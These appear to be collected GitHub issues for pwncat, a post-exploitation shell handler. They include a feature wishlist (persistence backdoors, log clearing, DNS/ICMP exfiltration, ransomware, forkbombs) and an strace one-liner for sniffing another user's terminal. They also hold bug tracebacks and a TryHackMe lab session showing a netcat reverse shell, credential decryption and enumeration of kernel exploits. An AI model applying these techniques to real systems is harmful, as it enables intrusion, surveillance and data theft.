six.reraise(type, exc, self._tb) File "/usr/lib/python2.7/dist-packages/setuptools/sandbox.py", line 154, in save_modules yield saved File "/usr/lib/python2.7/dist-packages/setuptools/sandbox.py", line 195, in setup_context yield File "/usr/lib/python2.7/dist-packages/setuptools/sandbox.py", line 250, in run_setup _execfile(setup_script, ns) File "/usr/lib/python2.7/dist-packages/setuptools/sandbox.py", line 44, in _execfile code = compile(script, filename, 'exec') File "/tmp/easy_install-KMLDok/typepy-1.1.1/setup.py", line 19 def get_release_command_class() -> Dict[str, setuptools.Command]: ^

The privesc provider should be able to take an argument user and search for potential setuid binaries or what sudo commands could be run as a specific user, not just root.

The privesc provider should utilize the self.pty.which functionality to know which necessary binaries are actually accessible on the target system.

Windows Functionality

• Import PowerShell libraries in Full-Language Mode (PowerView, PowerUp, etc.)
• Load tools into memory (Mimikatz, Rubeus)
• Perform SpoolSample.exe privescs

Privesc

• lxd containers
• chmod abuse -- make any GTFObin that gets a shell a SETUID binary owned by everyone
• Sudo -u#-1 CVE

Persistence

• Create bind listener [can be done as any user, could choose from known_binaries]
• Add cronjab(user/root)
• systemd service, init.d service [needs root]
• Add SSH keys [can be done as any user, needs ssh running]
• Install sneaky_pam [needs root, binary dependencies]
• Create SUID binary [needs root, binary dependencies]
• Chattr stomp files

Watch

• use strace to monitor another /dev/pts session.

sudo strace -e write=0,1,2 -e trace=write -s1000 -fp 11440 2>&1 \
| grep --line-buffered -o '".\+[^"]"' \
| grep --line-buffered -o '[^"]\+[^"]' \
| while read -r line; do
  printf "%b" $line;
done

• Hijack an SSH session or another active shell (Caleb did this with SSH before..?)

Aggression

• Spam /dev/urandom to other terminals?
• Drop SSH keys to users
• IP ban (refer to Red Team Field Manual)
• Flush firewall rules

File transfer

• FTP, TFTP, SMB
• DNS exfil
• ICMP exfil

Stealth

• Clear log files (refer to Red Team Field Manual)

Meme

• Terminal parrot
• ponysay
• cowsay
• wall
• write to user terminals
• Forkbomb
• Ransomware (hash/encrypt all files)

Custom

• Force overwrite of KoTH king.txt file?
• Scape inbound SSH connections

Crazy ideas

• Generate static binaries for the specific architecture and release
• Port forward
• Pivot through host to reach Internet

Describe the bug
Entering a tab at (local) results in traceback

Describe the target system
Tested on:

Distributor ID: Ubuntu
Description:    Ubuntu 20.04 LTS
Release:        20.04
Codename:       focal

Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:        2020.3
Codename:       kali-rolling

To Reproduce
Steps to reproduce the behavior:

1. Establish pwncat shell
2. Ctrd+D -> (local)
3. type (local) pwncat$ local <tab> <enter>
4. See error
   Traceback (most recent call last):

AttributeError: 'NoneType' object has no attribute 'get_completions'

Expected behavior
No tracebacks

Hello I just installed the tool using pip and when I run the command

pwncat -s -u SSH_USER -p SSH_PORT -H SSH_HOST -P SSH_PASSWORD

I get the following error.

Traceback (most recent call last):
  File "/home/kali/.local/bin/pwncat", line 8, in <module>                                                                                                                                                                                 
    sys.exit(main())                                                                                                                                                                                                                       
  File "/home/kali/.local/lib/python3.8/site-packages/pwncat/__main__.py", line 28, in main                                                                                                                                                
    pwncat.victim.command_parser.dispatch_line(                                                                                                                                                                                            
  File "/home/kali/.local/lib/python3.8/site-packages/pwncat/commands/__init__.py", line 290, in dispatch_line                                                                                                                             
    command.run(args)                                                                                                                                                                                                                      
  File "/home/kali/.local/lib/python3.8/site-packages/pwncat/commands/connect.py", line 229, in run
    pwncat.victim.connect(chan)
  File "/home/kali/.local/lib/python3.8/site-packages/pwncat/remote/victim.py", line 279, in connect
    hostname_path = self.run("which hostname").strip().decode("utf-8")
  File "/home/kali/.local/lib/python3.8/site-packages/pwncat/remote/victim.py", line 1032, in run
    sdelim, edelim = self.process(cmd, delim=wait, timeout=timeout)
  File "/home/kali/.local/lib/python3.8/site-packages/pwncat/remote/victim.py", line 1086, in process
    data = self.client.recv(len(command), socket.MSG_PEEK)

Local Info

Operative System: Kali Linux 2020.2
Python version: Python 3.8.3
User: non-root

Remote Info

Operative System: Ubuntu 14.04.5 LTS
User: non-root

How do I uninstall an old copy of pwncat in order to install a modified/updated version?

I was connected to a debian target machine and got the issues mentioned in the readme file but another workaroud i found is to spawn a /bin/bash with the usual python trick on the target and then setting the prompt to fancy. This workaround makes all the nice and fancy colors work. ps the 'python trick' im referring to is python3 -c 'import pty;pty.spawn("/bin/bash")'

Trying to connect over ssh to a system gives an error:

pwncat --ssh --user {SomeUser} --password {SomePass} -H {SomeIP}
Traceback (most recent call last):
  File "/home/me/.local/share/virtualenvs/proj-2l1lFwst/bin/pwncat", line 33, in <module>
    sys.exit(load_entry_point('pwncat', 'console_scripts', 'pwncat')())
  File "/home/me/.local/share/virtualenvs/proj-2l1lFwst/src/pwncat/pwncat/__main__.py", line 28, in main
    pwncat.victim.command_parser.dispatch_line(
  File "/home/me/.local/share/virtualenvs/proj-2l1lFwst/src/pwncat/pwncat/commands/__init__.py", line 290, in dispatch_line
    command.run(args)
  File "/home/me/.local/share/virtualenvs/proj-2l1lFwst/src/pwncat/pwncat/commands/connect.py", line 229, in run
    pwncat.victim.connect(chan)
  File "/home/me/.local/share/virtualenvs/proj-2l1lFwst/src/pwncat/pwncat/remote/victim.py", line 275, in connect
    hostname_path = self.run("which hostname").strip().decode("utf-8")
  File "/home/me/.local/share/virtualenvs/proj-2l1lFwst/src/pwncat/pwncat/remote/victim.py", line 1041, in run
    sdelim, edelim = self.process(cmd, delim=wait, timeout=timeout)
  File "/home/me/.local/share/virtualenvs/proj-2l1lFwst/src/pwncat/pwncat/remote/victim.py", line 1095, in process
    data = self.client.recv(len(command), socket.MSG_PEEK)
TypeError: recv() takes 2 positional arguments but 3 were given

Strange because I counted 2 arguments there, but usually this error indicates something with self 🤷

Feeling lazy, I thought the least I could do was stick a print(self.client) at line 1094 to help debug (if needed):

<paramiko.Channel 0 (open) window=2097096 -> <paramiko.Transport at 0x9c105c70 (cipher aes128-ctr, 128 bits) (active; 1 open channel(s))>>

And indeed Channel.recv takes 1 argument fewer than what is being passed in here.
http://docs.paramiko.org/en/stable/api/channel.html#paramiko.channel.Channel.recv

Not immediately sure how to proceed since I'm unfamiliar with the code, but I'm sure this is sufficient info for a fix?

My setup:

pyenv install 3.8.2
pipenv install -e git+https://github.com/calebstewart/pwncat.git#egg=pwncat
pipenv graph | grep paramiko
  - paramiko [required: ==2.7.1, installed: 2.7.1]

I honestly have no idea what's wrong. 🙈

(In the context of https://tryhackme.com/room/wonderland )

Connecting manually using ssh:

➜   ssh alice@$IP
[email protected]'s password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul 19 20:53:24 UTC 2020

  System load:  0.0                Processes:           87
  Usage of /:   18.9% of 19.56GB   Users logged in:     0
  Memory usage: 32%                IP address for eth0: 10.10.235.243
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Jul 19 20:53:15 2020 from 10.8.37.1
alice@wonderland:~$  # success

Connecting using pwncat:

➜   pwncat --ssh --user alice --host $IP --password "enter-pretty-password-here"
Traceback (most recent call last):
  File "/home/ebruines/.local/bin/pwncat", line 33, in <module>
    sys.exit(load_entry_point('pwncat==0.3.1', 'console_scripts', 'pwncat')())
  File "/home/ebruines/.local/lib/python3.8/site-packages/pwncat/__main__.py", line 28, in main
    pwncat.victim.command_parser.dispatch_line(
  File "/home/ebruines/.local/lib/python3.8/site-packages/pwncat/commands/__init__.py", line 290, in dispatch_line
    command.run(args)
  File "/home/ebruines/.local/lib/python3.8/site-packages/pwncat/commands/connect.py", line 229, in run
    pwncat.victim.connect(chan)
  File "/home/ebruines/.local/lib/python3.8/site-packages/pwncat/remote/victim.py", line 279, in connect
    hostname_path = self.run("which hostname").strip().decode("utf-8")
  File "/home/ebruines/.local/lib/python3.8/site-packages/pwncat/remote/victim.py", line 1035, in run
    sdelim, edelim = self.process(cmd, delim=wait, timeout=timeout)
  File "/home/ebruines/.local/lib/python3.8/site-packages/pwncat/remote/victim.py", line 1089, in process
    data = self.client.recv(len(command), socket.MSG_PEEK)
TypeError: recv() takes 2 positional arguments but 3 were given

Functionality

At present, we can start and administer only one listener at a time - pwncat --listen --port <port>. It will be useful to have the following, if possible:

1. The capability to start multiple listeners in one go (command-separated ports, or range of ports) (similar feature seen in cytopia/pwncat)

   • Comma separated
     pwncat -l 4444 /bin/bash:10.0.0.1:4445,4446,4447,4448

   • Range
     pwncat -l 4444 /bin/bash:10.0.0.1:4445-4448

   • Increment
     pwncat -l 4444 /bin/bash:10.0.0.1:4445+3

2. A central summary of all the active/inactive, persistent/non-persistent) shells (think: Metasploit Framework sessions or Empire)

3. Capability to execute a set of commands (enum / privesc etc) on all the active shells (think: Metasploit Framework auxiliary/post modules)

`` $ hak ~  pwncat -l --port 8888
bound to 0.0.0.0:8888 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[22:01:27] received connection from 10.10.73.80:41384 connect.py:148
[22:01:28] new host w/ hash 74243fcdf02c0ba65283e0341d03f77a victim.py:329
[22:01:30] pwncat running in /bin/sh victim.py:363
[22:01:31] pwncat is ready 🐈 victim.py:759

[\033[01;31m](remote)[\033[00m] [\033[01;33m]\u@\h[\033[00m]:[\033[01;36m]\w[\033[00m]$
[\033[01;31m](remote)[\033[00m] [\033[01;33m]\u@\h[\033[00m]:[\033[01;36m]\w[\033[00m]$ exit

[22:01:57] local terminal restored main.py:74
$ hak ~  pwncat -l --port 8888
[22:02:51] received connection from 10.10.73.80:41388 connect.py:148
[22:02:52] new host w/ hash 74243fcdf02c0ba65283e0341d03f77a victim.py:329
[22:02:54] pwncat running in /bin/bash victim.py:363
[22:02:55] pwncat is ready 🐈 victim.py:759

(remote) skyfuck@ubuntu:$ privesc
privesc: command not found
(remote) skyfuck@ubuntu:$
[22:03:54] local terminal restored victim.py:781
(local) pwncat$ privesc

• shell as root via possible password ('')
• shell as nobody via possible password ('')
• shell as merlin via possible password ('')
• shell as tomcat via possible password ('')
• shell as skyfuck via possible password ('')
• shell as root via possible password ('')
• shell as nobody via possible password ('')
• shell as merlin via possible password ('')
• shell as tomcat via possible password ('')
• shell as skyfuck via possible password ('')
  (local) pwncat$
  [22:04:32] pwncat is ready 🐈 victim.py:759

(remote) skyfuck@ubuntu:~$
[22:04:44] local terminal restored victim.py:781
(local) pwncat$ privesc -l

• shell as root via possible password ('')
• shell as nobody via possible password ('')
• shell as merlin via possible password ('')
• shell as tomcat via possible password ('')
• shell as skyfuck via possible password ('')
• shell as root via possible password ('')
• shell as nobody via possible password ('')
• shell as merlin via possible password ('')
• shell as tomcat via possible password ('')
• shell as skyfuck via possible password ('')
  (local) pwncat$
  [22:04:58] pwncat is ready 🐈 victim.py:759

(remote) skyfuck@ubuntu:$ sudo -l
[sudo] password for skyfuck:
Sorry, user skyfuck may not run sudo on ubuntu.
(remote) skyfuck@ubuntu:$
[22:05:44] local terminal restored victim.py:781
(local) pwncat$ enum
usage: enum [-h] [--show] [--long] [--no-enumerate] [--type TYPE] [--flush] [--provider PROVIDER] [--report REPORT] [--quick]
[--all]

Interface with the underlying enumeration module. This provides methods for enumerating, viewing and clearing cached facts
about the victim. There are various types of enumeration data which can be collected by pwncat. Some enumeration data is
provided by "enumerator" modules which will be automatically run if you request a type which they provide. On the other hand,
some enumeration is performed as a side-effect of other operations (normally a privilege escalation). This data is only stored
when it is found organically. To find out what types are available, you should use the tab-completion at the local prompt.
Some shortcuts are provided with the "enumeration groups" options below.

optional arguments:
-h, --help show this help message and exit
--long, -l Show long description of enumeration results (only valid for --show)
--no-enumerate, -n Do not perform actual enumeration; only print already enumerated values
--type TYPE, -t TYPE The type of enumeration data to query (only valid for --show/--flush)
--provider PROVIDER, -p PROVIDER
The enumeration provider to filter by

enumeration actions:
Exactly one action must be chosen from the below list.

--show, -s Find and display all facts of the given type and provider
--flush, -f Flush the queried enumeration data from the database. This only flushed the data specified by the
--type and --provider options. If no type or provider or specified, all data is flushed
--report REPORT, -r REPORT
Generate an enumeration report containing all enumeration data pwncat is capable of generating in a
Markdown format.

enumeration groups:
common enumeration groups; these put together various groups of enumeration types which may be useful

--quick, -q Activate the set of 'quick' enumeration types
--all, -a Activate all enumeration types (this is the default)
(local) pwncat$ privesc ?
usage: privesc [-h] [--list] [--all] [--user USER] [--max-depth MAX_DEPTH] [--read] [--write] [--path PATH] [--escalate]
[--exclude METHOD] [--data DATA]
privesc: error: unrecognized arguments: ?
(local) pwncat$ privesc --escalate
[22:06:42] privilege escalation failed: no route to root found privesc.py:192
(local) pwncat$
[22:07:36] pwncat is ready 🐈 victim.py:759

(remote) skyfuck@ubuntu:$ ls
credential.pgp tryhackme.asc
(remote) skyfuck@ubuntu:$
[22:08:14] local terminal restored victim.py:781
(local) pwncat$ download credential.pgp
credential.pgp ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 394/394 bytes • ? • 0:00:00
[22:08:24] downloaded 394.00B in 0.49 seconds download.py:79
(local) pwncat$ download tryhackme.asc
tryhackme.asc ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 5.0/5.0 KB • ? • 0:00:00
[22:08:30] downloaded 5.02KiB in 0.50 seconds download.py:79
(local) pwncat$
[22:12:05] pwncat is ready 🐈 victim.py:759

(remote) skyfuck@ubuntu:$ gpg --decrypt credential.pgp
gpg: directory /home/skyfuck/.gnupg' created gpg: new configuration file /home/skyfuck/.gnupg/gpg.conf' created
gpg: WARNING: options in /home/skyfuck/.gnupg/gpg.conf' are not yet active during this run gpg: keyring /home/skyfuck/.gnupg/secring.gpg' created
gpg: keyring `/home/skyfuck/.gnupg/pubring.gpg' created
gpg: encrypted with ELG-E key, ID 6184FBCC
gpg: decryption failed: secret key not available
(remote) skyfuck@ubuntu:$ gpg --inport tryhackme.asc
gpg: Invalid option "--inport"
(remote) skyfuck@ubuntu:$ gpg --import tryhackme.asc
gpg: key C6707170: secret key imported
gpg: /home/skyfuck/.gnupg/trustdb.gpg: trustdb created
gpg: key C6707170: public key "tryhackme [email protected]" imported
gpg: key C6707170: "tryhackme [email protected]" not changed
gpg: Total number processed: 2
gpg: imported: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1
(remote) skyfuck@ubuntu:$ gpg --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme [email protected]"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
"tryhackme [email protected]"
merlin:[REDACTED] }j(remote) skyfuck@ubuntu:~$ su merlin
Password:
merlin@ubuntu:/home/skyfuck$
[22:14:16] local terminal restored victim.py:781
(local) pwncat$ privesc
[22:14:19] no techniques found privesc.py:124
(local) pwncat$ privesc -l
[22:14:32] no techniques found privesc.py:124
(local) pwncat$ privesc --all
[22:14:36] no techniques found privesc.py:124
(local) pwncat$ privesc
[22:14:40] no techniques found privesc.py:124
(local) pwncat$ enum
usage: enum [-h] [--show] [--long] [--no-enumerate] [--type TYPE] [--flush] [--provider PROVIDER] [--report REPORT] [--quick]
[--all]

Interface with the underlying enumeration module. This provides methods for enumerating, viewing and clearing cached facts
about the victim. There are various types of enumeration data which can be collected by pwncat. Some enumeration data is
provided by "enumerator" modules which will be automatically run if you request a type which they provide. On the other hand,
some enumeration is performed as a side-effect of other operations (normally a privilege escalation). This data is only stored
when it is found organically. To find out what types are available, you should use the tab-completion at the local prompt.
Some shortcuts are provided with the "enumeration groups" options below.

optional arguments:
-h, --help show this help message and exit
--long, -l Show long description of enumeration results (only valid for --show)
--no-enumerate, -n Do not perform actual enumeration; only print already enumerated values
--type TYPE, -t TYPE The type of enumeration data to query (only valid for --show/--flush)
--provider PROVIDER, -p PROVIDER
The enumeration provider to filter by

enumeration actions:
Exactly one action must be chosen from the below list.

--show, -s Find and display all facts of the given type and provider
--flush, -f Flush the queried enumeration data from the database. This only flushed the data specified by the
--type and --provider options. If no type or provider or specified, all data is flushed
--report REPORT, -r REPORT
Generate an enumeration report containing all enumeration data pwncat is capable of generating in a
Markdown format.

enumeration groups:
common enumeration groups; these put together various groups of enumeration types which may be useful

--quick, -q Activate the set of 'quick' enumeration types
--all, -a Activate all enumeration types (this is the default)
(local) pwncat$ enum -a
usage: enum [-h] [--show] [--long] [--no-enumerate] [--type TYPE] [--flush] [--provider PROVIDER] [--report REPORT] [--quick]
[--all]
enum: error: argument --all/-a: -a: only valid for ['show']
(local) pwncat$ privesc ?
usage: privesc [-h] [--list] [--all] [--user USER] [--max-depth MAX_DEPTH] [--read] [--write] [--path PATH] [--escalate]
[--exclude METHOD] [--data DATA]
privesc: error: unrecognized arguments: ?
(local) pwncat$ privesc --escalate
[22:15:19] privilege escalation failed: no route to root found privesc.py:192
(local) pwncat$
[22:15:23] pwncat is ready 🐈 victim.py:759

(remote) merlin@ubuntu:/home/skyfuck$ sudo -l
Matching Defaults entries for merlin on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User merlin may run the following commands on ubuntu:
(root : root) NOPASSWD: /usr/bin/zip
(remote) merlin@ubuntu:/home/skyfuck$
[22:15:47] local terminal restored victim.py:781
(local) pwncat$ ?
[22:15:51] error: ?: unknown command init.py:264
(local) pwncat$ help

• alias
• back
• bind
• bruteforce
• busybox
• connect
• download
• enum
• euid_fix
• exit
• hashdump
• help
• local
• persist
• privesc
• prompt
• reset
• run
• set
• shortcut
• sync
• sysinfo
• tamper
• upload
  (local) pwncat$ euid_fix
  [22:16:07] euid is not 0 euid_fix.py:42
  (local) pwncat$ hashdump
  (local) pwncat$ enum
  usage: enum [-h] [--show] [--long] [--no-enumerate] [--type TYPE] [--flush] [--provider PROVIDER] [--report REPORT] [--quick]
  [--all]

Interface with the underlying enumeration module. This provides methods for enumerating, viewing and clearing cached facts
about the victim. There are various types of enumeration data which can be collected by pwncat. Some enumeration data is
provided by "enumerator" modules which will be automatically run if you request a type which they provide. On the other hand,
some enumeration is performed as a side-effect of other operations (normally a privilege escalation). This data is only stored
when it is found organically. To find out what types are available, you should use the tab-completion at the local prompt.
Some shortcuts are provided with the "enumeration groups" options below.

optional arguments:
-h, --help show this help message and exit
--long, -l Show long description of enumeration results (only valid for --show)
--no-enumerate, -n Do not perform actual enumeration; only print already enumerated values
--type TYPE, -t TYPE The type of enumeration data to query (only valid for --show/--flush)
--provider PROVIDER, -p PROVIDER
The enumeration provider to filter by

enumeration actions:
Exactly one action must be chosen from the below list.

--show, -s Find and display all facts of the given type and provider
--flush, -f Flush the queried enumeration data from the database. This only flushed the data specified by the
--type and --provider options. If no type or provider or specified, all data is flushed
--report REPORT, -r REPORT
Generate an enumeration report containing all enumeration data pwncat is capable of generating in a
Markdown format.

enumeration groups:
common enumeration groups; these put together various groups of enumeration types which may be useful

--quick, -q Activate the set of 'quick' enumeration types
--all, -a Activate all enumeration types (this is the default)
(local) pwncat$ enum -q
usage: enum [-h] [--show] [--long] [--no-enumerate] [--type TYPE] [--flush] [--provider PROVIDER] [--report REPORT] [--quick]
[--all]
enum: error: argument --quick/-q: -q: only valid for ['show']
(local) pwncat$ enum -q show
usage: enum [-h] [--show] [--long] [--no-enumerate] [--type TYPE] [--flush] [--provider PROVIDER] [--report REPORT] [--quick]
[--all]
enum: error: argument --quick/-q: -q: only valid for ['show']
(local) pwncat$ enum --show
CONFIGURATION.PASSWORD Facts by pwncat.enumerate.passwords
[33m''[39m from [36m/etc/java-8-openjdk/management/management.properties[39m:[34m187[39m
[33m''[39m from [36m/etc/java-8-openjdk/management/management.properties[39m:[34m189[39m
Possible password at [36m/etc/ssl/openssl.cnf[39m:[34m113[39m
Possible password at [36m/etc/ssl/openssl.cnf[39m:[34m114[39m
Possible password at [36m/etc/ssl/openssl.cnf[39m:[34m157[39m
[33m''[39m from [36m/etc/java-8-openjdk/management/management.properties[39m:[34m187[39m
[33m''[39m from [36m/etc/java-8-openjdk/management/management.properties[39m:[34m189[39m
SYSTEM.INIT Facts by pwncat.enumerate.system
Running [34mInit.SYSTEMD[39m
SUID Facts by pwncat.enumerate.suid
[36m/usr/lib/dbus-1.0/dbus-daemon-launch-helper[39m owned by [31mroot[39m
[36m/usr/lib/openssh/ssh-keysign[39m owned by [31mroot[39m
[36m/usr/lib/eject/dmcrypt-get-device[39m owned by [31mroot[39m
[36m/usr/bin/vmware-user-suid-wrapper[39m owned by [31mroot[39m
[36m/usr/bin/sudo[39m owned by [31mroot[39m
[36m/usr/bin/passwd[39m owned by [31mroot[39m
[36m/usr/bin/gpasswd[39m owned by [31mroot[39m
[36m/usr/bin/chsh[39m owned by [31mroot[39m
[36m/usr/bin/chfn[39m owned by [31mroot[39m
[36m/usr/bin/newgrp[39m owned by [31mroot[39m
[36m/bin/mount[39m owned by [31mroot[39m
[36m/bin/ping[39m owned by [31mroot[39m
[36m/bin/umount[39m owned by [31mroot[39m
[36m/bin/fusermount[39m owned by [31mroot[39m
[36m/bin/su[39m owned by [31mroot[39m
[36m/bin/ping6[39m owned by [31mroot[39m
SUDO Facts by sudo
merlin local=(root : root) NOPASSWD: /usr/bin/zip
FILE.CAPS Facts by pwncat.enumerate.capabilities

SYSTEM.CRONTAB Facts by pwncat.enumerate.crontab
[34mroot[39m runs [33m'cd / && run-parts --report /etc/cron.hourly'[39m
[34mroot[39m runs [33m'test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )'[39m
[34mroot[39m runs [33m'test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )'[39m
[34mroot[39m runs [33m'test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )'[39m
[34mroot[39m runs [33m'cd /root/ufw && bash ufw.sh'[39m
SYSTEM.FSTAB Facts by pwncat.enumerate.fstab
[34mUUID=dc927fae-cdab-4f2d-a233-715537ac23c8[39m [31mavailable[39m to mount at [33m/[39m as [36mext4[39m
[34mUUID=901d3c43-5f28-491a-b1eb-127a57ca96d0[39m [31mavailable[39m to mount at [33mnone[39m as [36mswap[39m
SYSTEM.KERNEL.EXPLOIT Facts by pwncat.enumerate.kernel-exploit
[31mdirty_cow[39m ([36mCVE-2016-5195[39m)
[31maf_packet[39m ([36mCVE-2016-8655[39m)
[31mget_rekt[39m ([36mCVE-2017-16695[39m)
[31mexploit_x[39m ([36mCVE-2018-14665[39m)
PROCESS Facts by pwncat.enumerate.processes
[31m root[39m [35m1 [39m [95m0 [39m [36m/sbin/init noprompt[39m
[31m root[39m [35m196 [39m [95m1 [39m [36m/lib/systemd/systemd-journald[39m
[31m root[39m [35m264 [39m [95m1 [39m [36m/lib/systemd/systemd-udevd[39m
[33m systemd+[39m [35m309 [39m [95m1 [39m [36m/lib/systemd/systemd-timesyncd[39m
[31m root[39m [35m553 [39m [95m1 [39m [36m/sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf
/var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0[39m
[31m root[39m [35m601 [39m [95m1 [39m [36m/usr/sbin/cron -f[39m
[31m root[39m [35m604 [39m [95m1 [39m [36m/lib/systemd/systemd-logind[39m
[31m root[39m [35m616 [39m [95m1 [39m [36m/usr/lib/accountsservice/accounts-daemon[39m
[33m message+[39m [35m623 [39m [95m1 [39m [36m/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile
--systemd-activation[39m
[34m syslog[39m [35m632 [39m [95m1 [39m [36m/usr/sbin/rsyslogd -n[39m
[34m dnsmasq[39m [35m671 [39m [95m1 [39m [36m/usr/sbin/dnsmasq -x /var/run/dnsmasq/dnsmasq.pid -u dnsmasq -r
/var/run/dnsmasq/resolv.conf -7 /etc/dnsmasq.d,.dpkg-dist,.dpkg-old,.dpkg-new --local-service
--trust-anchor=.,19036,8,2,49aac11d7b6f6446702e54a1607371607a1a41855200fd2ce1cdde32f24e8fb5
--trust-anchor=.,20326,8,2,e06d44b80b8f1d39a95c0b0d7c65d08458e880409bbc683457104237c7f8ec8d[39m
[35m tomcat[39m [35m704 [39m [95m1 [39m [36m/usr/lib/jvm/java-1.8.0-openjdk-amd64/jre/bin/java
-Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties
-Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.awt.headless=true
-Djava.security.egd=file:/dev/./urandom -Djdk.tls.ephemeralDHKeySize=2048
-Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027
-Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath
/opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat
-Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start[39m
[31m root[39m [35m715 [39m [95m1 [39m [36m/usr/sbin/sshd -D[39m
[31m root[39m [35m725 [39m [95m1 [39m [36m/sbin/agetty --noclear tty1 linux[39m
[31m root[39m [35m730 [39m [95m1 [39m [36m/sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220[39m
[39m
[35m skyfuck[39m [35m1606 [39m [95m1 [39m [36m/lib/systemd/systemd --user[39m
[35m skyfuck[39m [35m1608 [39m [95m1606 [39m [36m'(sd-pam)'[39m
[35m skyfuck[39m [35m1636 [39m [95m1603 [39m [36msshd: skyfuck@pts/0[39m
[35m skyfuck[39m [35m1637 [39m [95m1636 [39m [36m-bash[39m
[35m skyfuck[39m [35m2228 [39m [95m1637 [39m [36mcat /tmp/f[39m
[35m skyfuck[39m [35m2229 [39m [95m1637 [39m [36m/usr/bin/python3 -c import 'pty;' 'pty.spawn('"'"'/bin/bash'"'"')'[39m
[35m skyfuck[39m [35m2230 [39m [95m1637 [39m [36mnc 10.11.2.252 8888[39m
[35m skyfuck[39m [35m2274 [39m [95m2229 [39m [36m/bin/bash[39m
[31m root[39m [35m4454 [39m [95m2274 [39m [36msu merlin[39m
[94m merlin[39m [35m4455 [39m [95m4454 [39m [36mbash[39m
[94m merlin[39m [35m5149 [39m [95m4455 [39m [36mbash[39m
[94m merlin[39m [35m5150 [39m [95m5149 [39m [36m/bin/ps -eo pid,ppid,user,command --no-header -ww[39m
SYSTEM.ARCH Facts by pwncat.enumerate.system
Running on a [36mx86_64[39m processor
SYSTEM.ASLR Facts by pwncat.enumerate.system
ASLR is [31menabled[39m
SYSTEM.DISTRO Facts by pwncat.enumerate.system
Running [34mUbuntu 16.04.6 LTS[39m ([36mubuntu[39m), Version [31m16.04[39m, Build ID [32mNone[39m.
SYSTEM.HOSTNAME Facts by pwncat.enumerate.system
ubuntu
SYSTEM.NETWORK.HOSTS Facts by pwncat.enumerate.system
[39m
[39m
[39m
[39m
SYSTEM.NETWORK Facts by pwncat.enumerate.system
Interface [36mlo[39m w/ address [34m127.0.0.1/8[39m
Interface [36mlo[39m w/ address [34m::1/128[39m
Interface [36meth0[39m w/ address [34m10.10.73.80/16[39m
Interface [36meth0[39m w/ address [34mfe80::8e:e7ff:fefd:32a2/64[39m
SYSTEM.PACKAGE Facts by pwncat.enumerate.capabilities
[36maccountsservice[39m version [34m0.6.40-2ubuntu11.3[39m
[36madduser[39m version [34m3.113+nmu3ubuntu4[39m
[36madwaita-icon-theme[39m version [34m3.18.0-2ubuntu3.1[39m
[36mamd64-microcode[39m version [34m3.20191021.1+reall[39m
[36mapparmor[39m version [34m2.10.95-0ubuntu2.1[39m
[36mapt[39m version [34m1.2.32[39m
[36mapt-transport-https[39m version [34m1.2.32[39m
[36mapt-utils[39m version [34m1.2.32[39m
[36mbase-files[39m version [34m9.4ubuntu4.11[39m
[36mbase-passwd[39m version [34m3.5.39[39m
[36mbash[39m version [34m4.3-14ubuntu1.4[39m
[36mbash-completion[39m version [34m1:2.1-4.2ubuntu1.1[39m
[36mbind9-host[39m version [34m1:9.10.3.dfsg.P4-8[39m
[36mbsdmainutils[39m version [34m9.0.6ubuntu3[39m
[36mbsdutils[39m version [34m1:2.27.1-6ubuntu3.[39m
[36mbusybox-initramfs[39m version [34m1:1.22.0-15ubuntu1[39m
[36mbusybox-static[39m version [34m1:1.22.0-15ubuntu1[39m
[36mbzip2[39m version [34m1.0.6-8ubuntu0.2[39m
[36mca-certificates[39m version [34m2017071716.04.2[39m
[36mca-certificates-java[39m version [34m20160321ubuntu1[39m
[36mcommand-not-found[39m version [34m0.3ubuntu16.04.2[39m
[36mcommand-not-found-data[39m version [34m0.3ubuntu16.04.2[39m
[36mconsole-setup[39m version [34m1.108ubuntu15.5[39m
[36mconsole-setup-linux[39m version [34m1.108ubuntu15.5[39m
[36mcoreutils[39m version [34m8.25-2ubuntu316.0[39m
[36mcpio[39m version [34m2.11+dfsg-5ubuntu1[39m
[36mcrda[39m version [34m3.13-1[39m
[36mcron[39m version [34m3.0pl1-128ubuntu2[39m
[36mcurl[39m version [34m7.47.0-1ubuntu2.14[39m
